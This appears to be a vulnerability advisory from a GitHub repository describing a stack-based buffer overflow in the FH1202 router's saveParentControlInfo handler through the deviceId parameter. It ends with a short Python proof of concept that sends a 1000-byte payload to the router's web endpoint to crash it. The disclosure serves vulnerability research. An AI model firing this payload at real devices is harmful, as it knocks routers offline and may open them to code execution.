Skip to content

Latest commit

 

History

History
34 lines (21 loc) · 1.16 KB

saveParentControlInfo_deviceId.md

File metadata and controls

34 lines (21 loc) · 1.16 KB

Overview

Affected version

FH1202 V1.2.0.14(408)

Vulnerability details

The function saveParentControlInfo contains a stack-based buffer overflow vulnerability. It reads in a user-provided parameter deviceId, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer.

image-20240319223210791

As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

image-20240319223227916

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/saveParentControlInfo"
payload = b"a"*1000

data = {"deviceId": payload}
response = requests.post(url, data=data)
print(response.text)